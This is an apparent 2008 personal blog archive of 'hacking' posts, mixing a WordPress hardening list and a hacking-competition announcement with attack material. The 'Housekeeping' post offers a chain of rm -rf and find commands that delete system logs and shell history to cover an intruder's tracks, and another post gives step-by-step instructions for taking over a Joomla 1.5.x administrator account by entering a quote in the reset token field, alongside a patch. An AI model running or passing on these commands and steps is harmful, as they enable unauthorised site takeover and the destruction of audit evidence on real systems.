Hacking | Mr Am's SySteM

Archive for the 'hacking' Category

Housekeeping

August 16th, 2008

rm -rf /var/log rm -rf /var/adm rm -rf /var/apache/log rm -rf $HISTFILE find / -name .bash_history -exec rm -rf {} \; find / -name .bash_logout -exec rm -rf {} \; find / -name log* -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;

p/s : Use to delete your log at ur own risk..

Posted by Mr Am | Filed in Hacker, Network Security, hacking, linux | 2 Comments »

Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :

1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password

Upgrade to latest Joomla! version (1.5.6 or newer)

Add the following code to global $mainframe; on line 113 of reset.php

[sourcecode language='php']

if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;

}

[/sourcecode]

Posted by Mr Am | Filed in Bug, Hacker, Network Security, hacking | 2 Comments »

XSS scanner by d3hydr8

July 19th, 2008

Read the rest of this entry »

Posted by Mr Am | Filed in Hacker, IT, Network Security, Programming, hacking | Comment now »

How to secure your wordpress blog

July 15th, 2008

Use latest stable version of Wordpress. Don’t use beta version!
Your database table prefix must be other than default prefix (wp_) - Securing against sql injection.
Wordpress version must be hidden - Many hackers take this advantage to attack wordpress in version that vulnerable. So, let them know nothing.
Must be no user “admin” - this should be guested during sql injection. If u used it.. change it now.
Put .htaccess in yout /wp-admin/ directory. - avoid directory listing.

Posted by Mr Am | Filed in Hacker, Network Security, Wordpress, hacking | 2 Comments »

International Hacking Competition 2008 (i-Hack’08)

June 25th, 2008

Event

Basically there will be 10 programs that will be held in this event. There are:

1. Hacking Competition - Capture The Flag (CTF)
2. Hacking Competition - Computer Forensic Challenges
3. Hacking Competition - Defense Challenges
4. Hacking Competition - Malware Analysis Challenge
5. Student Computer Security Project Presentation
6. Computer Security Exhibition
7. Computer Security Forum
8. Computer Security Awareness Talk
9. Hack And Defense Workshop
10. Career Fair

click here for more information

Posted by Mr Am | Filed in Announcement, Hacker, SERVER, System, hacking | Comment now »

IM Online

User Online
- 3 Users Online
- Users: 3 Guests

Pagerank Checker

Technorati rank Technorati inblogs(authority) Technorati inlinks Technorati last update Google pagerank Alexa popularity Alexa backlink Google backlink Yahoo inlink Google indexed Yahoo indexed MSN indexed AllTheWeb result Altavista result Exactrank Googlebot last access Blogworth Listed in DMOZ or not ?
CLICK HERE